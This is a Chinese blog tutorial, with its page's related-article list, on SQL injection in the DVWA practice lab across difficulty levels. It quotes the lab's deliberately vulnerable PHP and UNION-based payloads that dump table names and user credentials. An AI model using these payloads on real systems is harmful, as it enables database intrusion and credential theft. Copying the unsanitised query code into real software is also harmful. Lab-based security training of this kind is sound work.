dvwa之sql注入学习(不同级别)

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量4.8w 收藏 170
点赞数 28
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36706878/article/details/79677078
版权

dvwa之sql注入学习(不同级别)

 

级别:Low

从页面上看到,有一个可以提交查询内容的地方

我们可以通过以下步骤判断这里是否存在注入点

① 输入1  提交

②输入1' 提交

③输入1 and 1=1 提交

④输入1 and 1=2提交

由上可以看出是存在注入点的,  我们猜测sql查询语句是这样的:  

select First name的列名 and Surname的列名 from 表名 where id的列名 ='我们输入的id'
我们看一下这里的源码  果然真的是这样,没有任何过滤

<?php

if( isset( $_REQUEST'Submit' ] ) ) {
    // Get input
    $id $_REQUEST'id' ];

    // Check database
    $query  "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res mysqli_connect_error()) ? $___mysqli_res false)) . '</pre>' );

    // Get results
    while( $row mysqli_fetch_assoc$result ) ) {
        // Get values
        $first $row["first_name"];
        $last  $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

 

?> 

那么我们首先爆出它的库试试,用单引号让id闭合

输入 1' union select1,database()#提交


可以看出目前使用的数据库为dvwa,接下来我们爆表试试

输入 1' union select1,table_name from information_schema.tables where table_name='dvwa'#


 

可以看到有两个表,我们爆一下users的列,

输入1' union select1,column_name from information_schema.columns where table_name='users'#


 

可以看出有好多的列,但是重要的应该是user列和password列,我们爆出这两列的字段内容

输入 1' union select1,concat(user,password) from users#

级别:Medium SQL Injection Source

这个级别我们可以看出,这是通过一个下拉表的方式提交数据的,

而且我们提交一个数据后发现URL如下

http://localhost/DVWA-1.9/vulnerabilities/sqli/#

所以不是get型注入,应该是把提交的数据存放到post数据中了

我们可以用hackbar试一下或者用burpsuite抓包试一下。先用hackbar试一下吧

添加post数据如下  点击run

得到返回的页面如下:

则我们就可以在这里添加注入语句了

添加post数据如下:

获得当前数据库为dvwa

使用burp suite

但是我们执行这句话时却报错了:id=2  union select1,table_name from information_schema.tables wheretable_name='dvwa'#&Submit=Submit

Low版本的就可以注入,中等的就不可以注入了,这是为什么呢?打开源码看一下:

Medium SQL Injection Source

<?php

 

if( isset( $_POST[ 'Submit' ] ) ) {

   // Get input

   $id = $_POST[ 'id' ];

    $id = mysql_real_escape_string($id );

 

   // Check database

   $query  = "SELECT first_name,last_name FROM users WHERE user_id = $id;";

   $result = mysql_query( $query ) or die( '<pre>' . mysql_error() .'</pre>' );

 

   // Get results

   $num = mysql_numrows( $result );

   $i   = 0;

   while( $i < $num ) {

       // Display values

       $first = mysql_result( $result, $i, "first_name" );

       $last  = mysql_result( $result,$i, "last_name" );

 

       // Feedback for end user

       echo "<pre>ID: {$id}<br />First name: {$first}<br/>Surname: {$last}</pre>";

 

        // Increase loop count

       $i++;

    }

 

   //mysql_close();

}

 

?>

发现有这样的一句话:$id = mysql_real_escape_string($id );

这句话是干什么用的呢?百度了一下知道

mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符,如输入单引号’则处理时会在其前面加上右斜杠\来进行转义,如果语句错误则输出相应的错误信息。其中受影响的字符如下:

\x00  \n  \r  \ '  "  \x1a

那我们换这样的注入方式 只要不用’就行

id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database())#&Submit=Submit

 

High级别

 

发现就直接爆出来了  和low级别方法差不多,这里就不一一爆字段了

 

过客璇璇
关注
  • 28
    点赞
  • 170
    收藏
    觉得还不错? 一键收藏
  • 19
    评论
专栏目录
DVWASQL注入
m0_67393157的博客
07-28 476
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
网络安全 DVWA通关指南 SQL Injection(SQL注入)
YueXuan_521的博客
06-17 1333
Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。布尔型盲注:根据返回页面判断条件真假时间型盲注:用页面返回时间是否增加判断是否存在注入基于错误的注入:页面会返回错误信息联合查询注入:可以使用union的情况下堆查询注入:可以同时执行多条语句使用参数化查询。数据库服务器不会把参数的内容当作SQL指令的一部分来拼接执行;而是在数据库完成SQL指令的编译后才套用参数运行(预编译)。
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1226
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA通过攻略之SQL注入
勿山几已
05-24 8560
简单介绍SQL注入,演示手工进行SQL注入用sqlmap进行自动化SQL注入
DVWA-SQL手工注入
2302_80164634的博客
02-03 1997
查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
2020-12-06-DVWA之sql.md
01-24
### DVWA之SQL Injection知识点详解 #### 一、SQL Injection概念 ...同时,通过对等难度级别SQL注入的分析,也提醒我们在开发过程需要注意对用户输入进行合理的验证和转义处理,避免因疏忽而造成的安全风险。
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
每个漏洞都有不同的难度级别,适合不同程度的学习者。 SQL-li-labs则专注于SQL注入,这是Web应用程序最常见且危险的一种安全问题。在SQL-li-labs,用户可以通过尝试输入特定的查询字符串来触发注入,从而获取未...
软件安全实验2 SQL注入实验
最新发布
06-19
DVWA目前的版本共有十个漏洞模块,分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的...
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5882
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 3341
获得字段的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句含有单引号。
DVWASQL注入的思路
底层社会中的弱智
06-21 598
笔记 如何把两个没有关系的表结合起来 union联合查询 前面的查询字段数量要和后面的数量相同 select user,pass from mysql.user union select user from word.wp_user; 这里只有一个,使用数字充当字段 select user,pass...
DVWASQL注入的步骤
XZZbh的博客
09-18 640
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
DVWA SQL注入不同级别
qq_43452198的博客
04-17 4618
DVWA SQL注入 级别目录DVWA SQL注入手工注入思路lowmediumhighimpossible SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sql...
SQL注入(盲注)--DVWA
xy_sugar的博客
01-24 748
概述 、 分类:布尔型、延时型 LOW等级 手工 1、首先了解业务,这里和回显注入不一样,不会显示id对应的用户名,只是告诉我们他存在即为真 输入-1,返回为假 三种注入POC(真 and 假=假) 尝试第一种情况,返回为真,说明数据没有注入进去,不存在SQL注入漏洞 输入第二种情况1' and '1024'='1025 ,返回结果为假没说明存在注入漏洞 尝...
SQL注入简单版思路总结 (基于DVWA系统)
qq_41497476的博客
05-17 435
对于有提示,丝毫不加过滤的表单注入顺序如下: 一.探测是否有诸如点 常用的简单php处理语句有三类: 1.select *from … where id=’$input_data’ 2.select *from … where id=$input_data 3. select *from … where id="$input_data" 对于这三种情况,需要输入三种数据进行探测 最常见的情况1,输...
dvwa sql 注入高级
gwl7878的博客
07-07 4054
cat sqli.txt  POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1 Host: 172.19.180.27 Proxy-Connection: keep-alive Content-Length: 19 Cache-Control: max-age=0 Accept: text/html,applicatio
dvwasql注入(低级)
12-21
包含了不同级别漏洞,包括SQL注入SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段插入恶意的SQL代码来执行未经授权的数据库操作。 在DVWA进行SQL注入(低级)的操作如下: 1. 打开DVWA...
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值